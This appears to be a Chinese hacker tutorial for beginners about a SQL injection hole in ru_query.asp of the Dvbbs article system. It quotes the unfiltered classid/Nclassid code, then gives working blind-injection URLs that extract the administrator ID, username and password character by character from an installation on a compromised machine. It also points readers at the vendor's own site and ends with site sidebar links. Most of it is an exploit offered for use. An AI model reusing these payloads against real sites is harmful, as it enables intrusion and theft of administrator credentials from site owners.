写给新手。。。。。。。。
因为当初想不通过管理来改欲望的文章,就看了一下动网文章的代码,发现了一个漏洞,同样是一个变量未过滤的漏洞,经测试,动网官方的文章系统也有此问题。
漏洞在ru_query.asp中,影响版本:所有。
看其中如下代码:
if request("classid")="" then
classid=""
classname="所有文章"
'classid="classid=1 and "
'sql="select class from Aclass where classid=1"
'rs.open sql,conn,1,1
'classname=rs("class")
'rs.close
else
classid="classid="&cstr(request("classid"))&" and "
sql="select class from Aclass where classid="&cstr(request("classid"))
rs.open sql,conn,1,1
classname=rs("class")
rs.close
end if
if request("Nclassid")="" then
Nclassid=""
Nclassname="所有文章"
else
Nclassid=" Nclassid="&cstr(request("Nclassid"))&" and "
sql="select Nclass from ANclass where Nclassid="&cstr(request("Nclassid"))
rs.open sql,conn,1,1
Nclassname=rs("Nclass")
rs.close
end if
呵呵,classid,nclassid都没有过滤,而且不用SEESION,(废话!这怎么要啊?!)呵呵,很简单,用一个就行了,好了我门就来实战一次,
我在肉鸡上安装了 动网文章3。4 用户名:admin 密码:admin86
第一步,截获数据
进入搜索页面,然后随便添,关键字我添的是test,好,停!打开wsockexpert选择监视此IE,然后转到IE点搜索,这时wsocexpert里就出数据包了,如下:
action=title&classid=&Nclassid=&keyword=test&Submit=%CB%D1%CB%F7
转换的IE的地址即
http://ip/ru_query.asp?action=title&classid=1&Nclassid=1&keyword=test&Submit=%CB%D1%CB%F7
好了!
第二步:测试管理员用户名
我门利用classid进行注入攻击
http://ip/ru_query.asp?action=title&classid=1 and 1=2&Nclassid=1&keyword=test&Submit=%CB%D1%CB%F7
因为classid=1 and 1=2是假,这时出错的信息是500,服务器内部错误,
http://ip/ru_query.asp?action=title&classid=1 and 1=(select min(id) from admin where flag=1)&Nclassid=1&keyword=test&Submit=%CB%D1%CB%F7
注:flag=1 为管理员
500了,说明ID不为1,
http://ip/ru_query.asp?action=title&classid=1 and 2=(select min(id) from admin where flag=1)&Nclassid=1&keyword=test&Submit=%CB%D1%CB%F7
返回了文章,OK,管理员ID=2
http://ip/ru_query.asp?action=title&classid=1 and 2=(select min(id) from admin where len(username)>1 and flag=1)&Nclassid=1&keyword=test&Submit=%CB%D1%CB%F7
开始测试用户名长度,返回了,长度大于1,呵呵当然了
然后依次试,当提交如下时
http://ip/ru_query.asp?action=title&classid=1 and 2=(select min(id) from admin where len(username)>=5 and flag=1)&Nclassid=1&keyword=test&Submit=%CB%D1%CB%F7
返回了,说明用户名的长度为5
开始测试用户名第一位
http://ip/ru_query.asp?action=title&classid=1 and 2=(select min(id) from admin where asc(mid(username,1,1))>90 and flag=1)&Nclassid=1&keyword=test&Submit=%CB%D1%CB%F7
MID函数可以把密码分成若干部分取出,使用方法 MID(字符串,起始位,取出的字符串的长度),我的这句是说把PASSWORD中的第一位字符取出, ASC可以把字母转换成ASC码
然后我就判断他的ASC码的范围
返回了,说明他的第一位ASC码大于90
http://ip/ru_query.asp?action=title&classid=1[/url] and 2=(select min(id) from admin where asc(mid(username,1,1))>100 and flag=1)&Nclassid=1&keyword=test&Submit=%CB%D1%CB%F7
500错误了,说明第一位ASC码小于100,最后
http://ip/ru_query.asp?action=title&classid=1[/url] and 2=(select min(id) from admin where asc(mid(username,1,1))=97 and flag=1)&Nclassid=1&keyword=test&Submit=%CB%D1%CB%F7
返回了,呵呵第一位是97,对应的是a
就这样依次猜可以得出用户名为admin
猜密码的时候仅把变量username 改为password即可,。
就这么简单,
同时要说明的是,asc ,mid为VBSCRIPT的函数,要是服务器端为JAVASCIPT就不能使了,呵呵,譬如动网官方的服务器,应改为对应的JAVA函数。
相关视频
相关阅读 微信支付漏洞会造成哪些影响 微信支付存在漏洞要怎么办海盗来了能量漏洞是什么 微信海盗来了能量漏洞介绍英特尔cpu漏洞怎么修复 intelcpu漏洞补丁英特尔处理器漏洞怎么回事 英特尔处理器漏洞是什么苹果电脑安全漏洞是什么 苹果电脑安全漏洞无需密码解锁解决办法零日漏洞是什么意思?零日漏洞的介绍及防御ios设备时间漏洞_修改时间为1970年1月1日之后iPhone变砖及附解决iOS8.4越狱被曝重大安全隐患 谨慎而行
热门文章 没有查询到任何记录。
最新文章
防止DdoS攻击:通过路
解析卡巴斯基特色之漏
网站被sql注入的修复方法Ubuntu破解Windows和防护的三种方法防黑客qq改密码技巧如何保证Foxmail泄露邮箱密码安全
人气排行 路由器被劫持怎么办?路由器DNS被黑客篡改怎防止DdoS攻击:通过路由器绕过DDoS防御攻击如何彻底清除电脑病毒?如何使用无忧隐藏无线路由防蹭网办法车模兽兽激情视频下载暗藏木马使用四款防黑客软件的体会怎么防止木马入侵
查看所有0条评论>>